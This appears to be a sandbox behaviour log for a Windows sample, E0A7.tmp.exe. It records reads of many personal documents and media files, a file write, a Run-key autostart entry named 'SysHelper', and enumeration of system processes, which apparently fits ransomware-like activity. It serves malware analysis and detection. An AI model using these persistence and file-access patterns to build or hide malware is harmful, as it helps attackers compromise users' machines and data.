Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CFtrxYI4ehxro.doc	size = 153605, size_out = 93603	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CVd8AGKl82socUEV.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CVd8AGKl82socUEV.png	size = 153605, size_out = 1790	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	size = 153605, size_out = 153605	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EFVz.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EFVz.flv	size = 153605, size_out = 64429	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gI1Ph3odyc3WWitg.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gI1Ph3odyc3WWitg.swf	size = 153605, size_out = 78697	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\HDxPsHkhhG.jpg	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\HDxPsHkhhG.jpg	size = 153605, size_out = 9643	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\i1wOhL3vMDC.gif	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\i1wOhL3vMDC.gif	size = 153605, size_out = 34531	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ig-pKA.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ig-pKA.docx	size = 153605, size_out = 52410	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iPCx0KzGTdc.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iPCx0KzGTdc.mp3	size = 153605, size_out = 95802	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KRom7uq2QFi.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KRom7uq2QFi.m4a	size = 153605, size_out = 45471	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\msHzUMaVeyMhZg.ods	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\msHzUMaVeyMhZg.ods	size = 153605, size_out = 36093	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\oYQm89fmHM2V.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\oYQm89fmHM2V.ppt	size = 153605, size_out = 85076	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\plOBtmmjgx5C31gv7.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\plOBtmmjgx5C31gv7.mkv	size = 153605, size_out = 67275	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qW ivUaVqr_On1.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qW ivUaVqr_On1.avi	size = 153605, size_out = 18491	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Rboqf3f1pV5M.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Rboqf3f1pV5M.png	size = 153605, size_out = 72754	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t9PlAeBS-2DXgBXz.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t9PlAeBS-2DXgBXz.mkv	size = 153605, size_out = 3613	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uRUwiXJup.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uRUwiXJup.flv	size = 153605, size_out = 72026	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VDarx005qh2__sirr.png	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VDarx005qh2__sirr.png	size = 153605, size_out = 46512	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\y7SdTqWYI32_I2EQyR.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\y7SdTqWYI32_I2EQyR.flv	size = 153605, size_out = 22056	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yg8 kLfurYIaQM697h.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\yg8 kLfurYIaQM697h.mkv	size = 153605, size_out = 70599	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zDvwnZ.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zDvwnZ.mkv	size = 153605, size_out = 93295	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-G9kfPr.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-G9kfPr.doc	size = 153605, size_out = 41399	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\15jZzXpvGAgxYF0U.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\15jZzXpvGAgxYF0U.docx	size = 153605, size_out = 86297	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\29xL.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\29xL.docx	size = 153605, size_out = 9045	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5BThH.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5BThH.xlsx	size = 153605, size_out = 88542	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5eEgQJA.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\5eEgQJA.doc	size = 153605, size_out = 36829	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\6agqO0CE.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\6agqO0CE.xlsx	size = 153605, size_out = 56042	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7Cdo.csv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7Cdo.csv	size = 153605, size_out = 93924	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\A8Lf.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\A8Lf.pptx	size = 153605, size_out = 96642	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ApjV0L.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ApjV0L.xlsx	size = 153605, size_out = 36236	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRr UxgKvk lgV DA.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\bRr UxgKvk lgV DA.pptx	size = 153605, size_out = 6513	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dlmumiy0mdd o.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dlmumiy0mdd o.xlsx	size = 153605, size_out = 1364	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\E9c6yerqTjnAvgifiGH.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\E9c6yerqTjnAvgifiGH.pptx	size = 153605, size_out = 28638	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\e9_rdw 0S48c8wWGxtcZ.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\e9_rdw 0S48c8wWGxtcZ.docx	size = 153605, size_out = 33637	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\F66QZsvCIiq3.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\F66QZsvCIiq3.xlsx	size = 153605, size_out = 80409	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods	size = 153605, size_out = 51967	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\g61yn2 WbDs1g.odp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\g61yn2 WbDs1g.odp	size = 153605, size_out = 75473	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GaPuN558 zq.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GaPuN558 zq.xlsx	size = 153605, size_out = 30444	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gdzkVlfc2.rtf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gdzkVlfc2.rtf	size = 153605, size_out = 45284	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ii08Wr6qQ2it.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ii08Wr6qQ2it.pptx	size = 153605, size_out = 26773	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\INx_XXf1fj2VzxVM7GZ.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\INx_XXf1fj2VzxVM7GZ.ppt	size = 153605, size_out = 88093	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Jmoep.pps	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Jmoep.pps	size = 153605, size_out = 29761	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\lZ7mFKQ3H.pdf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\lZ7mFKQ3H.pdf	size = 153605, size_out = 16110	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\MiOR3NQChO8s.rtf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\MiOR3NQChO8s.rtf	size = 153605, size_out = 4020	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mSBpETwT0_vcERkN.odp	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mSBpETwT0_vcERkN.odp	size = 153605, size_out = 19135	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\N-K3DozDdSgAnSFGZTgY.xlsx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\N-K3DozDdSgAnSFGZTgY.xlsx	size = 153605, size_out = 25296	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NX4iP.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NX4iP.ppt	size = 153605, size_out = 40427	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\O2S3Yxp w.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\O2S3Yxp w.pptx	size = 153605, size_out = 102170	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\qi4IqurK09.ods	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\qi4IqurK09.ods	size = 153605, size_out = 32939	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Qt-jSAXq.rtf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Qt-jSAXq.rtf	size = 153605, size_out = 60124	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\S-x55k_cPLVq5X206.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\S-x55k_cPLVq5X206.pptx	size = 153605, size_out = 25888	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SmhleleUG.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SmhleleUG.pptx	size = 153605, size_out = 89898	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SP2GZ4Hm5D5gkPiI7Yd.odt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\SP2GZ4Hm5D5gkPiI7Yd.odt	size = 153605, size_out = 73720	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ueOgE3Fdxzan.rtf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ueOgE3Fdxzan.rtf	size = 153605, size_out = 1498	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uzFjE-EbKZbDlUR6.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uzFjE-EbKZbDlUR6.docx	size = 153605, size_out = 45601	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\w6EPq2zN2ah.ppt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\w6EPq2zN2ah.ppt	size = 153605, size_out = 27154	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\W6IMk7.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\W6IMk7.doc	size = 153605, size_out = 48308	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBp8E7tRnFvGA7kM1v.docx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WBp8E7tRnFvGA7kM1v.docx	size = 153605, size_out = 96578	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\xDyNG4Bi0L.pptx	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\xDyNG4Bi0L.pptx	size = 153605, size_out = 52658	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XXACe99aeIe9AwdxB.doc	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XXACe99aeIe9AwdxB.doc	size = 153605, size_out = 61274	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_JLH3OA.odt	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_JLH3OA.odt	size = 153605, size_out = 42392	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-avjGaTi5fer-bMia.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-avjGaTi5fer-bMia.mp3	size = 153605, size_out = 34296	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8GQt402SpMYiSB.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8GQt402SpMYiSB.mp3	size = 153605, size_out = 69326	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\9Tpbrmx9-eI2m3we6r.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\9Tpbrmx9-eI2m3we6r.mp3	size = 153605, size_out = 38122	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\ArZI.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\ArZI.wav	size = 153605, size_out = 24107	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\EfZdtNhwP.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\EfZdtNhwP.wav	size = 153605, size_out = 78523	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Hgc-ATkiW0nvYtLeb_2n.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Hgc-ATkiW0nvYtLeb_2n.wav	size = 153605, size_out = 26077	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\HLn_CQ4.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\HLn_CQ4.wav	size = 153605, size_out = 25622	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iYZ-gLKtWydBalI Lxxb.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iYZ-gLKtWydBalI Lxxb.wav	size = 153605, size_out = 84977	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\j pK_84.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\j pK_84.mp3	size = 153605, size_out = 47244	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NBJbBMpw.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NBJbBMpw.wav	size = 153605, size_out = 34564	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\P8IAG.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\P8IAG.m4a	size = 153605, size_out = 21675	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RAzu8DVMv-r45eOe8.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RAzu8DVMv-r45eOe8.mp3	size = 153605, size_out = 2708	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\svbuVRxjZk-A.mp3	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\svbuVRxjZk-A.mp3	size = 153605, size_out = 20318	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\xGq9s.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\xGq9s.wav	size = 153605, size_out = 65887	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\YEmk 2o.m4a	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\YEmk 2o.m4a	size = 153605, size_out = 17847	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z29_EgFwKYFm3nLlZNM.wav	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z29_EgFwKYFm3nLlZNM.wav	size = 153605, size_out = 39067	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4mbF.gif	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4mbF.gif	size = 153605, size_out = 17172	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\pCb9pgcYyZh0BJvZP_h.gif	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\pCb9pgcYyZh0BJvZP_h.gif	size = 153605, size_out = 9055	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-cTwhDb_kz0NM.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-cTwhDb_kz0NM.mkv	size = 153605, size_out = 3155	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-odfzMtVfgsa IL.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-odfzMtVfgsa IL.swf	size = 153605, size_out = 91252	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\1wkpap.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\1wkpap.mkv	size = 153605, size_out = 92156	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\4wuSJ8EnkH3MW.swf	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\4wuSJ8EnkH3MW.swf	size = 153605, size_out = 58997	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8caLHfAk0PaW.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8caLHfAk0PaW.avi	size = 153605, size_out = 21486	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8rejvdNsx1W.flv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8rejvdNsx1W.flv	size = 153605, size_out = 101866	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\90ZHyHwir.mp4	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\90ZHyHwir.mp4	size = 153605, size_out = 57540	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AklgegIwErKzeM3EnB.mkv	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AklgegIwErKzeM3EnB.mkv	size = 153605, size_out = 26362	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AKzil.avi	size = 38, size_out = 38	1	Fn Data
Read	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AKzil.avi	size = 153605, size_out = 55752	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\FT5DlVKU9skfgHqGxmUn.ods	size = 51962	1	Fn Data
For performance reasons, the remaining 772 entries are omitted. The remaining entries can be found in glog.xml.

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe" --AutoStart, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	value_name = SysHelper, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn

Process (26)

Operation	Process	Additional Information	Count	Logfile
Enumerate Processes	-	-	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (428)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x756f0000	3	Fn
Load	RPCRT4.dll	base_address = 0x76960000	1	Fn
Load	MPR.dll	base_address = 0x74790000	1	Fn
Load	WININET.dll	base_address = 0x74d20000	1	Fn
Load	WINMM.dll	base_address = 0x745e0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75cb0000	1	Fn
Load	KERNEL32.dll	base_address = 0x756f0000	1	Fn
Load	USER32.dll	base_address = 0x759b0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74e50000	1	Fn
Load	SHELL32.dll	base_address = 0x75d10000	1	Fn
Load	ole32.dll	base_address = 0x75ab0000	1	Fn
Load	OLEAUT32.dll	base_address = 0x76a50000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x745c0000	1	Fn
Load	WS2_32.dll	base_address = 0x750a0000	1	Fn
Load	DNSAPI.dll	base_address = 0x74430000	1	Fn
Load	CRYPT32.dll	base_address = 0x75800000	1	Fn
Load	msvcr100.dll	base_address = 0x74370000	1	Fn
Load	Psapi.dll	base_address = 0x74e40000	1	Fn
Load	Shell32.dll	base_address = 0x75d10000	58	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x756f0000	14	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\e0a7.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe, size = 260	2	Fn
